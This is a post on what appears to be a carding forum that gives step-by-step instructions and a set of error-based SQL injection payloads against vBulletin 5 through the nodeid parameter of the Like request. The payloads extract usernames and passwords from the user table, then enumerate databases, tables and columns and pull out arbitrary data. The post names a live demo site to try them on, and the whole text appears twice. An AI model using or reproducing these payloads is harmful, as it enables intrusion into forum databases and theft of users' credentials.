CardingMafia Admin
04-04-2013, 10:37 AM
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: Forums - Forums
http://vb5connect.com/bb/
************************************************** ****************
-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png
//Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other SQLi Syntaxes]
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: Forums - Forums
http://vb5connect.com/bb/
************************************************** ****************
-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png
//Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other SQLi Syntaxes]
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------